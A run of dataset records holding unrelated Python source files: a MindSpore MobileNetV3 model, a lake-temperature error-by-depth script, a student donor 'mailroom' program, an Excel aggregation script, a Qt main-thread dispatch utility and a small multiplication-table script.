Activation(nn.Cell):\n \"\"\"\n Activation definition.\n\n Args:\n act_func(string): activation name.\n\n Returns:\n Tensor, output tensor.\n \"\"\"\n\n def __init__(self, act_func):\n super(Activation, self).__init__()\n if act_func == 'relu':\n self.act = nn.ReLU()\n elif act_func == 'relu6':\n self.act = nn.ReLU6()\n elif act_func in ('hsigmoid', 'hard_sigmoid'):\n self.act = nn.HSigmoid()\n elif act_func in ('hswish', 'hard_swish'):\n self.act = nn.HSwish()\n else:\n raise NotImplementedError\n\n def construct(self, x):\n return self.act(x)\n\n\nclass GlobalAvgPooling(nn.Cell):\n \"\"\"\n Global avg pooling definition.\n\n Args:\n\n Returns:\n Tensor, output tensor.\n\n Examples:\n >>> GlobalAvgPooling()\n \"\"\"\n\n def __init__(self, keep_dims=False):\n super(GlobalAvgPooling, self).__init__()\n self.mean = ops.ReduceMean(keep_dims=keep_dims)\n\n def construct(self, x):\n x = self.mean(x, (2, 3))\n return x\n\n\nclass SE(nn.Cell):\n \"\"\"\n SE warpper definition.\n\n Args:\n num_out (int): Numbers of output channels.\n ratio (int): middle output ratio.\n\n Returns:\n Tensor, output tensor.\n\n Examples:\n >>> SE(4)\n \"\"\"\n\n def __init__(self, num_out, ratio=4):\n super(SE, self).__init__()\n num_mid = _make_divisible(num_out // ratio)\n self.pool = GlobalAvgPooling(keep_dims=True)\n self.conv1 = nn.Conv2d(in_channels=num_out, out_channels=num_mid,\n kernel_size=1, has_bias=True, pad_mode='pad')\n self.act1 = Activation('relu')\n self.conv2 = nn.Conv2d(in_channels=num_mid, out_channels=num_out,\n kernel_size=1, has_bias=True, pad_mode='pad')\n self.act2 = Activation('hsigmoid')\n self.mul = ops.Mul()\n\n def construct(self, x):\n out = self.pool(x)\n out = self.conv1(out)\n out = self.act1(out)\n out = self.conv2(out)\n out = self.act2(out)\n out = self.mul(x, out)\n return out\n\n\nclass Unit(nn.Cell):\n \"\"\"\n Unit warpper definition.\n\n Args:\n num_in (int): Input channel.\n num_out (int): Output channel.\n kernel_size (int): Input kernel size.\n stride (int): Stride size.\n padding (int): Padding number.\n num_groups (int): Output num group.\n use_act (bool): Used activation or not.\n act_type (string): Activation type.\n\n Returns:\n Tensor, output tensor.\n\n Examples:\n >>> Unit(3, 3)\n \"\"\"\n\n def __init__(self, num_in, num_out, kernel_size=1, stride=1, padding=0, num_groups=1,\n use_act=True, act_type='relu'):\n super(Unit, self).__init__()\n self.conv = nn.Conv2d(in_channels=num_in,\n out_channels=num_out,\n kernel_size=kernel_size,\n stride=stride,\n padding=padding,\n group=num_groups,\n has_bias=False,\n pad_mode='pad')\n self.bn = nn.BatchNorm2d(num_out)\n self.use_act = use_act\n self.act = Activation(act_type) if use_act else None\n\n def construct(self, x):\n out = self.conv(x)\n out = self.bn(out)\n if self.use_act:\n out = self.act(out)\n return out\n\n\nclass ResUnit(nn.Cell):\n \"\"\"\n ResUnit warpper definition.\n\n Args:\n num_in (int): Input channel.\n num_mid (int): Middle channel.\n num_out (int): Output channel.\n kernel_size (int): Input kernel size.\n stride (int): Stride size.\n act_type (str): Activation type.\n use_se (bool): Use SE warpper or not.\n\n Returns:\n Tensor, output tensor.\n\n Examples:\n >>> ResUnit(16, 3, 1, 1)\n \"\"\"\n def __init__(self, num_in, num_mid, num_out, kernel_size, stride=1, act_type='relu', use_se=False):\n super(ResUnit, self).__init__()\n self.use_se = use_se\n self.first_conv = (num_out != num_mid)\n self.use_short_cut_conv = True\n\n if self.first_conv:\n self.expand = Unit(num_in, num_mid, kernel_size=1,\n stride=1, padding=0, act_type=act_type)\n else:\n self.expand = None\n self.conv1 = Unit(num_mid, num_mid, kernel_size=kernel_size, stride=stride,\n padding=self._get_pad(kernel_size), act_type=act_type, num_groups=num_mid)\n if use_se:\n self.se = SE(num_mid)\n self.conv2 = Unit(num_mid, num_out, kernel_size=1, stride=1,\n padding=0, act_type=act_type, use_act=False)\n if num_in != num_out or stride != 1:\n self.use_short_cut_conv = False\n self.add = ops.Add() if self.use_short_cut_conv else None\n\n def construct(self, x):\n \"\"\"construct\"\"\"\n if self.first_conv:\n out = self.expand(x)\n else:\n out = x\n out = self.conv1(out)\n if self.use_se:\n out = self.se(out)\n out = self.conv2(out)\n if self.use_short_cut_conv:\n out = self.add(x, out)\n return out\n\n def _get_pad(self, kernel_size):\n \"\"\"set the padding number\"\"\"\n pad = 0\n if kernel_size == 1:\n pad = 0\n elif kernel_size == 3:\n pad = 1\n elif kernel_size == 5:\n pad = 2\n elif kernel_size == 7:\n pad = 3\n else:\n raise NotImplementedError\n return pad\n\n\nclass MobileNetV3(nn.Cell):\n \"\"\"\n MobileNetV3 architecture.\n\n Args:\n model_cfgs (Cell): number of classes.\n num_classes (int): Output number classes.\n multiplier (int): Channels multiplier for round to 8/16 and others. Default is 1.\n final_drop (float): Dropout number.\n round_nearest (list): Channel round to . Default is 8.\n Returns:\n Tensor, output tensor.\n\n Examples:\n >>> MobileNetV3(num_classes=1000)\n \"\"\"\n\n def __init__(self, model_cfgs, num_classes=1000, multiplier=1., final_drop=0.,\n round_nearest=8, include_top=True, activation=\"None\"):\n super(MobileNetV3, self).__init__()\n self.cfgs = model_cfgs['cfg']\n self.inplanes = 16\n self.features = []\n first_conv_in_channel = 3\n first_conv_out_channel = _make_divisible(multiplier * self.inplanes)\n\n self.features.append(nn.Conv2d(in_channels=first_conv_in_channel,\n out_channels=first_conv_out_channel,\n kernel_size=3, padding=1, stride=2,\n has_bias=False, pad_mode='pad'))\n self.features.append(nn.BatchNorm2d(first_conv_out_channel))\n self.features.append(Activation('hswish'))\n for layer_cfg in self.cfgs:\n self.features.append(self._make_layer(kernel_size=layer_cfg[0],\n exp_ch=_make_divisible(multiplier * layer_cfg[1]),\n out_channel=_make_divisible(multiplier * layer_cfg[2]),\n use_se=layer_cfg[3],\n act_func=layer_cfg[4],\n stride=layer_cfg[5]))\n output_channel = _make_divisible(multiplier * model_cfgs[\"cls_ch_squeeze\"])\n self.features.append(nn.Conv2d(in_channels=_make_divisible(multiplier * self.cfgs[-1][2]),\n out_channels=output_channel,\n kernel_size=1, padding=0, stride=1,\n has_bias=False, pad_mode='pad'))\n self.features.append(nn.BatchNorm2d(output_channel))\n self.features.append(Activation('hswish'))\n self.features.append(GlobalAvgPooling(keep_dims=True))\n self.features.append(nn.Conv2d(in_channels=output_channel,\n out_channels=model_cfgs['cls_ch_expand'],\n kernel_size=1, padding=0, stride=1,\n has_bias=False, pad_mode='pad'))\n self.features.append(Activation('hswish'))\n if final_drop > 0:\n self.features.append((nn.Dropout(p=1 - final_drop)))\n\n # make it nn.CellList\n self.features = nn.SequentialCell(self.features)\n self.include_top = include_top\n self.need_activation = False\n if self.include_top:\n self.output = nn.Conv2d(in_channels=model_cfgs['cls_ch_expand'],\n out_channels=num_classes,\n kernel_size=1, has_bias=True, pad_mode='pad')\n self.squeeze = ops.Squeeze(axis=(2, 3))\n if activation != \"None\":\n self.need_activation = True\n if activation == \"Sigmoid\":\n self.activation = ops.Sigmoid()\n elif activation == \"Softmax\":\n self.activation = ops.Softmax()\n else:\n raise NotImplementedError(f\"The activation {activation} not in [Sigmoid, Softmax].\")\n\n self._initialize_weights()\n\n def construct(self, x):\n x = self.features(x)\n if self.include_top:\n x = self.output(x)\n x = self.squeeze(x)\n if self.need_activation:\n x = self.activation(x)\n return x\n\n\n def _make_layer(self, kernel_size, exp_ch, out_channel, use_se, act_func, stride=1):\n mid_planes = exp_ch\n out_planes = out_channel\n\n layer = ResUnit(self.inplanes, mid_planes, out_planes,\n kernel_size, stride=stride, act_type=act_func, use_se=use_se)\n self.inplanes = out_planes\n return layer\n\n def _initialize_weights(self):\n \"\"\"\n Initialize weights.\n\n Args:\n\n Returns:\n None.\n\n Examples:\n >>> _initialize_weights()\n \"\"\"\n self.init_parameters_data()\n for _, m in self.cells_and_names():\n if isinstance(m, (nn.Conv2d)):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.set_data(ms.Tensor(np.random.normal(0, np.sqrt(2. / n),\n m.weight.data.shape).astype(\"float32\")))\n if m.bias is not None:\n m.bias.set_data(\n ms.numpy.zeros(m.bias.data.shape, dtype=\"float32\"))\n elif isinstance(m, nn.BatchNorm2d):\n m.gamma.set_data(\n ms.Tensor(np.ones(m.gamma.data.shape, dtype=\"float32\")))\n m.beta.set_data(\n ms.numpy.zeros(m.beta.data.shape, dtype=\"float32\"))\n elif isinstance(m, nn.Dense):\n m.weight.set_data(ms.Tensor(np.random.normal(\n 0, 0.01, m.weight.data.shape).astype(\"float32\")))\n if m.bias is not None:\n m.bias.set_data(ms.numpy.zeros(m.bias.data.shape, dtype=\"float32\"))\n\n\ndef mobilenet_v3(model_name, **kwargs):\n \"\"\"\n Constructs a MobileNet V2 model\n \"\"\"\n model_cfgs = {\n \"large\": {\n \"cfg\": [\n # k, exp, c, se, nl, s,\n [3, 16, 16, False, 'relu', 1],\n [3, 64, 24, False, 'relu', 2],\n [3, 72, 24, False, 'relu', 1],\n [5, 72, 40, True, 'relu', 2],\n [5, 120, 40, True, 'relu', 1],\n [5, 120, 40, True, 'relu', 1],\n [3, 240, 80, False, 'hswish', 2],\n [3, 200, 80, False, 'hswish', 1],\n [3, 184, 80, False, 'hswish', 1],\n [3, 184, 80, False, 'hswish', 1],\n [3, 480, 112, True, 'hswish', 1],\n [3, 672, 112, True, 'hswish', 1],\n [5, 672, 160, True, 'hswish', 2],\n [5, 960, 160, True, 'hswish', 1],\n [5, 960, 160, True, 'hswish', 1]],\n \"cls_ch_squeeze\": 960,\n \"cls_ch_expand\": 1280,\n },\n \"small\": {\n \"cfg\": [\n # k, exp, c, se, nl, s,\n [3, 16, 16, True, 'relu', 2],\n [3, 72, 24, False, 'relu', 2],\n [3, 88, 24, False, 'relu', 1],\n [5, 96, 40, True, 'hswish', 2],\n [5, 240, 40, True, 'hswish', 1],\n [5, 240, 40, True, 'hswish', 1],\n [5, 120, 48, True, 'hswish', 1],\n [5, 144, 48, True, 'hswish', 1],\n [5, 288, 96, True, 'hswish', 2],\n [5, 576, 96, True, 'hswish', 1],\n [5, 576, 96, True, 'hswish', 1]],\n \"cls_ch_squeeze\": 576,\n \"cls_ch_expand\": 1280,\n }\n }\n return MobileNetV3(model_cfgs[model_name], **kwargs)\n\n\nmobilenet_v3_large = partial(mobilenet_v3, model_name=\"large\")\nmobilenet_v3_small = partial(mobilenet_v3, model_name=\"small\")\n","sub_path":"official/cv/MobileNet/mobilenetv3/src/mobilenetV3.py","file_name":"mobilenetV3.py","file_ext":"py","file_size_in_byte":14211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"563092212","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.model_selection import KFold\nimport pdb\nimport sys\nsys.path.append('../../data')\nfrom scipy.stats import spearmanr\nimport re\nimport os\nimport glob\n\nmetadata = pd.read_feather(\"../../../metadata/lake_metadata_2700plus.feather\")\nsites = pd.read_csv('../../../metadata/sites_moreThan10ProfilesWithGLM_Mar2020Update.csv')\nids = pd.read_csv('../../../metadata/pball_site_ids.csv', header=None)\nids = ids[0].values\nglm_all_f = pd.read_csv(\"../../../results/glm_transfer/RMSE_transfer_glm_pball.csv\")\ntrain_df = pd.read_feather(\"../../../results/transfer_learning/glm/train_rmses_pball.feather\")\ntrain_lakes = [re.search('nhdhr_(.*)', x).group(1) for x in np.unique(glm_all_f['target_id'].values)]\nn_lakes = len(train_lakes)\nall_sites = metadata['site_id'].values\nall_test_lakes = all_sites[~np.isin(all_sites, train_lakes)]\n\nglm_all_f = pd.read_csv(\"../../../results/glm_transfer/RMSE_transfer_glm_pball.csv\")\ntrain_df = pd.read_feather(\"../../../results/transfer_learning/glm/train_rmses_pball.feather\")\ntrain_lakes = [re.search('nhdhr_(.*)', x).group(1) for x in np.unique(glm_all_f['target_id'].values)]\nn_lakes = len(train_lakes)\nsome_test_lakes = ids[~np.isin(ids, train_lakes)]\n\n\nglm_err_per_depth = np.empty((550),dtype=np.object)\n# glm_err_per_depth = [[] for i in range(550)]\npg_err_per_depth = np.empty((550),dtype=np.object)\n# pg_err_per_depth = [[] for i in range(550)]\n\nfor i in range(550):\n glm_err_per_depth[i] = []\n pg_err_per_depth[i] = []\n# pg_err_per_depth[:] = 0\n# glm_err_per_depth[:] = 0\nct_per_depth = np.empty((550))\nct_per_depth[:] = 0\n# some_test_lakes = all_test_lakes\n# all_test_lakes = np.array(all_test_lakes[0:4])\nfor site_ct, site_id in enumerate(all_test_lakes):\n\tprint(\"site \", site_ct,\"/\",len(all_test_lakes))\n\n\t#load output files\n\toutput = pd.read_feather('./mtl_outputs/nhdhr_'+site_id+'/9source_ensemble_output')\n\n\t#load glm file\n\tglm_out = np.load('../../../data/processed/lake_data/'+site_id+'/glm.npy')\n\tglm_dates = np.load('../../../data/processed/lake_data/'+site_id+'/dates.npy')\n\tlabels_npy = np.load('../../../data/processed/lake_data/'+site_id+'/full.npy')\n\n\n\t#load label\n\tlabel = pd.read_feather('./mtl_outputs/nhdhr_'+site_id+'/labels')\n\n\t#align glm and output dates\n\tfor d in range(glm_out.shape[0]):\n\t\tglm_err = np.sqrt(np.nanmean((glm_out[d,:]-labels_npy[d,:])**2))\n\t\t# if site_ct == 2:\n\t\t\t# pdb.set_trace()\n\t\tpg_err = np.sqrt(np.nanmean((np.array(output.iloc[d,1:].values,dtype=np.float32) - np.array(label.iloc[d,1:].values,dtype=np.float32))**2))\n\t\tif np.isnan(pg_err):\n\t\t\tcontinue\n\t\telif np.isnan(glm_err):\n\t\t\tprint(\"glm err nan?\")\n\t\t\tpdb.set_trace()\n\t\t\tcontinue\n\t\telse:\n\t\t\tpg_err_per_depth[d].append(pg_err)\n\t\t\t# pg_err_per_depth[d] += pg_err\n\t\t\t# glm_err_per_depth[d] += glm_err\n\t\t\tglm_err_per_depth[d].append(glm_err)\n\t\t\t# ct_per_depth[d] += 1\npg_medians = [np.median(np.array(pg_err_per_depth[i])) for i in range(550)]\nglm_medians = [np.median(np.array(glm_err_per_depth[i])) for i in range(550)]\n# pg_means = (pg_err_per_depth / ct_per_depth)\n# glm_means = (glm_err_per_depth / ct_per_depth)\na = pd.DataFrame()\na['pg_median'] = pg_medians\na['glm_median'] = glm_medians\n# a['lakes_w_depth'] = ct_per_depth\na.to_csv('./err_by_depth_2233lakes_median.csv')\n\n\n\n","sub_path":"src/scripts/manylakes2/computeErrorByDepth.py","file_name":"computeErrorByDepth.py","file_ext":"py","file_size_in_byte":3319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"238637126","text":"import sys\n\n\ndonor_data = {\"sai emani\": [20.23, 30.456, 50.786],\n \"sirisha marthy\": [67.89, 45.89],\n \"ani emani\": [12.789, 5.456],\n \"charles dickens\": [15.89, 89.20, 345.67],\n \"mark twain\": [678.986]\n }\n\n\nclass Donor(object):\n def __init__(self, name, donations):\n if not name:\n raise ValueError(\"Donor name can not be empty\")\n self.name = name\n if not donations:\n self.donations = []\n else:\n self.donations = donations\n\n @property\n def first_name(self):\n name_split = self.name.split()\n if len(name_split) >= 1:\n return name_split[0]\n\n @property\n def last_name(self):\n name_split = self.name.split()\n if len(name_split) == 1:\n return ''\n else:\n return ''.join(name_split[1:])\n @property\n def donor_donations(self):\n \"\"\"\n Returns list of donor donations\n :return: list of donor donations\n \"\"\"\n return self.donations\n @property\n def donor_donations_sum(self):\n \"\"\"\n Returns sum of all donor donations\n :return: donor latest donation\n \"\"\"\n return sum(self.donations)\n @property\n def latest_donation(self):\n \"\"\"\n Returns donor latest donation\n :return: donor latest donation\n \"\"\"\n if self.donations:\n return self.donations[-1]\n\n def add_donation(self, amount):\n \"\"\"\n Adds donation to donor donations\n :return:\n \"\"\"\n if float(amount) <= 0:\n raise ValueError(\"donation amount can not be negative\")\n self.donations.append(float(amount))\n\n def generate_letter(self):\n \"\"\" Generate letter for donor \"\"\"\n return \"Dear {},\\n \\nThank you for your generous donation {}.\\n \\n\\n\\t\\tSincerely, \\n\\t\\tLocal Charity\". \\\n format(self.name, self.latest_donation)\n\nclass Donors(object):\n def __init__(self, donors_list=None):\n # list of donors objects\n if not donors_list:\n self.donors_list = []\n else:\n self.donors_list = donors_list\n @property\n def list_of_donors(self):\n return [donor.name for donor in self.donors_list]\n\n @property\n def count(self):\n return len(self.donors_list)\n\n def add_donor(self, donor):\n self.donors_list.append(donor)\n\n def get_donor(self, name):\n if name == \"\":\n return None\n\n for donor in self.donors_list:\n if donor == name:\n return donor\n new_donor = Donor(name, [])\n self.add_donor(new_donor)\n return new_donor\n\n def send_letters(self):\n \"\"\" Send letters to every one, the letters will be stored as text files on disk \"\"\"\n for donor in self.donors_list:\n file_name = donor.name + \".txt\"\n letter = donor.generate_letter()\n with open(file_name, \"w\") as f:\n f.write(letter)\n\n def create_a_report(self):\n \"\"\" Prints donor information for all donors\n \"\"\"\n print(\"Donor Name | Total Given | Num Gifts | Average Gift\")\n for donor in self.donors_list:\n if donor.donations:\n print(f\"{donor.name:26} $ {sum(donor.donations):>10.2f} {len(donor.donations):9} \"\n f\"${sum(donor.donations)/len(donor.donations):>12.2f}\")\n else:\n print(\"coming to else\")\n\n def load_donors_list(self):\n temp_list = []\n donations = []\n for donor in donor_data:\n donor_obj = Donor(donor, donations)\n donor_obj.donations = donor_data[donor]\n temp_list.append(donor_obj)\n self.donors_list = temp_list\n return self.count\n\n def save_donors_list(self):\n for donor in self.donors_list:\n if donor.name not in donor_data:\n donor_data[donor.name] = donor.donations\n return self.count\n\n def total_contribution(self):\n return sum([sum(d.donations) for d in self.donors_list])\n\n def challenge(self, mul, min_donation=None, max_donation=None):\n if min_donation and max_donation:\n def func(x): return max_donation > x > min_donation\n\n elif min_donation:\n def func(x): return x > min_donation\n\n elif max_donation:\n def func(x): return x < max_donation\n else:\n def func(x): return True\n\n return Donors([Donor(donor.name, list(map(lambda x: x ** mul, filter(func, donor.donations))))\n for donor in self.donors_list])\n\n\ndef send_a_thankyou(donors_obj):\n \"\"\" Sends thank you message for the donors\n \"\"\"\n while True:\n name = str(\n input(\"Please enter donor name (enter \\\"list\\\" to show list of donor names, enter \\\"q\\\" to quit)\"))\n if name == \"q\":\n return\n elif name == \"list\":\n print(\"List of donor names\")\n print((\"{}\\n\" * donors_obj.count).format(*donors_obj.list_of_donors))\n continue\n else:\n donor = donors_obj.get_donor(name)\n if not donor:\n print(\"Name can not be empty\")\n continue\n else:\n break\n while True:\n try:\n amount = input(\"Please enter donation amount\")\n if float(amount) <= 0:\n print(\"amount donated must be a +ve number\")\n else:\n break\n except ValueError:\n print(\"Enter positive number\")\n donor.add_donation(amount)\n #for donor in donors_obj.donors_list:\n # print(\"Donor name {} and donation {}\".format(donor.name, donor.donations))\n print(donor.generate_letter())\n\ndef menu(menu_data):\n\n \"\"\" Select one of the four items in the menu\n And returns the number \"\"\"\n\n print(\"\\nPlease choose one of the following options:\")\n\n for index, menu_item in enumerate(menu_data): # Prints the menu user text\n print(f\"{index + 1}) {menu_item[0]}\")\n\n choice = int(input(\"> \")) - 1\n\n if choice in range(len(menu_data)): # Ensure that option chosen is within menu range, this\n return menu_data[choice][1], menu_data[choice][2] # handles choosing 0, which would return menu_data[-1][1]\n\n return None\n\n\ndef make_projections(donors_obj):\n\n min =0\n max =0\n mul = 1\n\n projection = donors_obj.challenge(mul, min, max)\n def set_value():\n while True:\n try:\n value = float(input(\"Set value >\"))\n if value <= 0:\n print(\"Must be a positive number\")\n else:\n break\n except ValueError:\n print(\"Please enter a numerical value\")\n return value\n\n while True:\n projections_menu = [\n (\"enter min amount for multiplier to take effect. [Currently ${}]\".format(mul), set_value, 'min'),\n (\"enter max amount for multiplier to take effect. [Currently ${}]\".format(mul), set_value, 'max'),\n (\"enter a multiplier value. [Currently {}]\".format(mul), set_value, 'mul'),\n (\"print report past distributions\", donors_obj.create_a_report, None),\n (\"Print projected distributions\", projection.create_a_report, None),\n (\"print total contributed comparison\", \"compare_total\", None),\n (\"quit menu\", 'quit', None)\n ]\n\n fn , param = menu(projections_menu)\n if param == 'min':\n min = fn()\n elif param == 'max':\n max = fn()\n elif param == mul:\n mul = fn()\n\n if param:\n projection = donors_obj.challenge(mul, min, max)\n elif fn == 'compare_total':\n print(f\"Original total contribution: {donors_obj.total_contribution():.2f}\")\n print(f\"Projeected total contribution: {projection.total_contribution():.2f}\")\n elif fn == 'quit':\n return\n else:\n fn()\n\nif __name__ == \"__main__\":\n donors_obj = Donors()\n menu_fns = [\n ('Send thank you', send_a_thankyou, donors_obj),\n ('create a report', donors_obj.create_a_report, None),\n ('send letters to every one', donors_obj.send_letters, None),\n ('load donors list', donors_obj.load_donors_list, None),\n ('save donors list', donors_obj.save_donors_list, None),\n ('quit', sys.exit, None)\n ]\n\n #choice_dict = {1: send_a_thankyou, 2: donors_obj.create_a_report, 3: donors_obj.send_letters,\n # 4: donors_obj.load_donors_list, 5: donors_obj.save_donor_list, 6: sys.exit}\n while True:\n try:\n fn , param = menu(menu_fns)\n if param:\n fn(param)\n else:\n fn()\n except TypeError:\n continue\n except ValueError:\n continue\n\n\n\n\n\n","sub_path":"students/msirisha/lesson04/mailroom.py","file_name":"mailroom.py","file_ext":"py","file_size_in_byte":8973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"255073354","text":"# -*- coding: utf-8 -*-\n\"\"\"\nActitrack 解析\n\"\"\"\nimport os\nimport sys\nimport glob\nimport csv #csvモジュールをインポートする\nimport datetime\nimport numpy as np\nimport pandas as pd\nfrom time import sleep\nfrom tqdm import tqdm\n\n#設置ディレクトリ\nprint(\"設置ディレクトリ : %s\" % os.path.dirname(__file__))\ndir_root = os.path.dirname(__file__)\ndir_replace = dir_root + \"\\low_data\\\\\"\n\n# ファイル一覧を取得\ndir_low = dir_root + \"\\excel\\*.xlsx\"\nfiles_list_total = glob.glob(dir_low)\n# 結果を格納するデータフレーム\ndf_result = pd.DataFrame(\n\t{\"Subject Name\":[],\n\t \"AN. Time Interval STOP\":[],\n\t \"Immobility Duration Total (Seconds)\":[],\n\t},\n\t columns=[\"Subject Name\",\"AN. Time Interval STOP\",\"Immobility Duration Total (Seconds)\"])\n\nprint(files_list_total)\nn = 0\n# メイン\nfor file in tqdm(files_list_total):\n\tif n == 0:\n\t\t# print(\"ファイル名は\" + file + \"です\")\n\t\twith open(file, 'r') as f:\n\t\t\t#シート名を指定して読み込み\n\t\t\tsheet = \"Summary Report\"\n\t\t\treader = csv.reader(f)\n\t\t\tEXL = pd.ExcelFile(file) # xlsxOpen\n\t\t\t#ヘッダーを含みシートを開く\n\t\t\tData = EXL.parse(sheet) # DataFrameとして読込\n\t\t\t#データ抽出\n\t\t\tData_split = Data.loc[:,[\"Subject Name\",\"AN. Time Interval STOP\",\"Immobility Duration Total (Seconds)\"]]\n\t\t\tID = Data_split.iloc[0,:][1]\n\t\t\tID = str(ID)\n\t\t\tData_split[\"%s\" %ID] = Data_split[\"Immobility Duration Total (Seconds)\"]\n\t\t\t# print(Data_split[\"Immobility Duration Total (Seconds)\"])\n\t\t\t#print(Data_split)\n\t\t\tdf_result = Data_split.loc[:,[\"Subject Name\",\"%s\" %ID]]\n\t\t\t#df_result = pd.merge(df_result, Data_split, on=\"Subject Name\")\n\t\t\tn = n +1\n\telse:\n\t\twith open(file, 'r') as f:\n\t\t\t#シート名を指定して読み込み\n\t\t\tsheet = \"Summary Report\"\n\t\t\treader = csv.reader(f)\n\t\t\tEXL = pd.ExcelFile(file) # xlsxOpen\n\t\t\t#ヘッダーを含みシートを開く\n\t\t\tData = EXL.parse(sheet) # DataFrameとして読込\n\t\t\t#データ抽出\n\t\t\tData_split = Data.loc[:,[\"Subject Name\",\"AN. Time Interval STOP\",\"Immobility Duration Total (Seconds)\"]]\n\t\t\tID = Data_split.iloc[0,:][1]\n\t\t\tID = str(ID)\n\t\t\tData_split[\"%s\" %ID] = Data_split[\"Immobility Duration Total (Seconds)\"]\n\t\t\t#df_result = pd.concat([df_result, Data_split],axis=0)\n\t\t\tdf_result = pd.merge(df_result, Data_split.loc[:,[\"Subject Name\",\"%s\" %ID]], on=\"Subject Name\")\n\n# print(df_result)\n\nfilename = datetime.datetime.today()\noutput_path = \"Analysis/\" + filename.strftime(\"%Y%m%d%H%M%S\") + \".xlsx\"\nprint(output_path)\n\n#pandasのモジュールであるExcelWriterを使用してエクセルに書き込む形式にする\nwriter = pd.ExcelWriter(output_path)\ndf_result.to_excel(writer, sheet_name = 'time')\nwriter.save()\n\n\n","sub_path":"FST_data/FTS_analysis.py","file_name":"FTS_analysis.py","file_ext":"py","file_size_in_byte":2696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"168694976","text":"\"\"\"Functions for working with threads in Qt applications. Usually for dealing\nwith running in the main event loop (e.g. thread) or not.\n\nThese functions are known to work as reasonable replacements for the functions\nprovided by both Maya and Nuke.\n\nWe want to be able to use these functions and have them present reasonable\nactions even if there is no event loop. In most cases, that means immediately\ncalling the function.\n\nAnother large benefit of these functions is that they are re-rentrant, unlike\nthe functions provided in either Maya or Nuke which will lock up the main\nthread if called from the main thread.\n\n\"\"\"\n\nfrom __future__ import absolute_import\n\nimport Queue as queue\nimport traceback\nimport sys\n\nfrom .qt import Q, QtCore\n\n\nif QtCore is not None:\n\n\n class _Event(Q.Event):\n\n _type_int = Q.Event.registerEventType()\n _type = Q.Event.Type(_type_int) # Mostly for PySide.\n\n def __init__(self, res_queue, func, args, kwargs):\n super(_Event, self).__init__(self._type)\n self.res_queue = res_queue\n self.func = func\n self.args = args\n self.kwargs = kwargs\n\n def process(self):\n\n self.accept()\n\n try:\n res = self.func(*self.args, **self.kwargs)\n\n # Catch EVERYTHING, including KeyboardInterrupt and SystemExit.\n except:\n\n if self.res_queue:\n self.res_queue.put((False, sys.exc_info()[1]))\n else:\n sys.stderr.write('Uncaught exception in main thread.\\n')\n traceback.print_exc()\n\n else:\n if self.res_queue:\n self.res_queue.put((True, res))\n\n return True\n\n\n class _Dispatcher(Q.Object):\n\n def __init__(self):\n super(_Dispatcher, self).__init__()\n\n self.running = False\n self._app = None\n\n # If we can grab the app, push over to its thread, and then\n # queue up (or immediately call) the signal.\n if self.app:\n self.moveToThread(self.app.thread())\n self.defer(self.signal_start)\n\n # Otherwise, schedule a timer to run (assumed to be in the\n # main thread) so that we can grab the app at that point.\n else:\n Q.Timer.singleShot(0, self.signal_start)\n\n def signal_start(self):\n self.running = True\n if self.thread() is not self.app.thread():\n self.moveToThread(self.app.thread())\n\n @property\n def app(self):\n if self._app is None:\n self._app = Q.Application.instance()\n return self._app\n\n def event(self, event):\n if isinstance(event, _Event):\n return event.process()\n else:\n return super(_Dispatcher, self).event(event)\n\n def is_main_thread(self):\n return (not self.running) or self.app.thread() is Q.Thread.currentThread()\n\n def defer(self, func, *args, **kwargs):\n\n if self.is_main_thread():\n func(*args, **kwargs)\n return\n\n self.app.postEvent(self, _Event(None, func, args, kwargs))\n\n def call(self, func, *args, **kwargs):\n\n if self.is_main_thread():\n return func(*args, **kwargs)\n\n # TODO: Be able to figure out when the function is called\n # but does not throw something into the queue (for whatever\n # reasons, so that we can stop blocking. Perhaps a pair of\n # weakrefs?\n\n res_queue = queue.Queue()\n self.app.postEvent(self, _Event(res_queue, func, args, kwargs))\n ok, res = res_queue.get()\n\n if ok:\n return res\n else:\n raise res\n\n\n _dispatcher = _Dispatcher()\n\nelse:\n\n _dispatcher = None\n\n\ndef defer_to_main_thread(func, *args, **kwargs):\n \"\"\"Call the given function in the main thread, but don't wait for results.\n\n If an exception is thrown, a traceback will be printed.\n\n This function is re-entrant, and calling from the main thread will call the\n passed function immediately (discarding the result).\n\n If Qt is not running, it will call the function immediately.\n\n \"\"\"\n if not _dispatcher:\n func(*args, **kwargs)\n return\n _dispatcher.defer(func, *args, **kwargs)\n\n\ndef call_in_main_thread(func, *args, **kwargs):\n \"\"\"Call the given function in the main thread, and wait for results.\n\n If an exception is thrown, it will be reraised here.\n\n This function is re-entrant, and calling from the main thread will call the\n passed function immediately.\n\n If Qt is not running, it will call the function immediately.\n\n \"\"\"\n if not _dispatcher:\n return func(*args, **kwargs)\n return _dispatcher.call(func, *args, **kwargs)\n\n\ndef is_main_thread():\n \"\"\"Return True if this is in the main thread (or Qt is not running).\"\"\"\n if not _dispatcher:\n return True\n else:\n return _dispatcher.is_main_thread()\n\n\n\n\n\n\n","sub_path":"uitools/threads.py","file_name":"threads.py","file_ext":"py","file_size_in_byte":5146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"333134021","text":"def Multiplicar():\r\n\tpergunta = input(\"Montar a tabuada de: \")\r\n\tiniciando = input(\"Começar por: \")\r\n\tterminando = input(\"Terminar em: \")\r\n\tpergunta = int(pergunta)\r\n\tiniciando = int(iniciando)\r\n\tterminando = int(terminando)\r\n\tif iniciando > terminando:\r\n\t\tprint(\"O número final tem que ser maior que o número inicial. \")\r\n\t\treturn Multiplicar()\r\n\tprint()\r\n\tprint(\"Vou montar a tabuada de: \", pergunta, \"começando em \", iniciando, \"e terminando em \", terminando, \":\")\r\n\twhile iniciando <= terminando:\r\n\t\tprint(pergunta, \"x\", iniciando, \"=\", pergunta * iniciando)\r\n\t\tiniciando = iniciando + 1\t\r\n\treturn\r\n\r\nMultiplicar()","sub_path":"Python/Bonus.py","file_name":"Bonus.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"31690063","text":"# 